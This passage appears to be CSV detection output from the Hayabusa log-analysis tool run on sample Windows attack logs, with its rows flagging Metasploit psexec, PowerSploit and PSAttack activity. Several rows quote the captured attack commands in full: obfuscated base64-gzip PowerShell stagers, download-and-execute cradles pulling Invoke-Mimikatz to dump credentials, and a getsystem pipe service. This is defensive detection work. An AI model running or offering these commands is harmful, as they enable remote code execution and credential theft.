f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.605 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.605 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.605 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:58.162 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:58.162 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:58.162 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:58.169 +00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:58.169 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:58.169 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 18:27:25.424 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:39.918 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:42.755 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:42.802 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:43.068 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:44.943 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:44.943 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:55.689 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:55.705 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:55.986 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:58.267 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:58.267 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:33:13.923 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:33:13.923 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:41:27.017 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:41:27.017 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:45:16.455 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:24.408 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 18:45:48.501 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-20 19:15:32.581 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:49.846 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:53.753 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:53.785 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:53.847 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 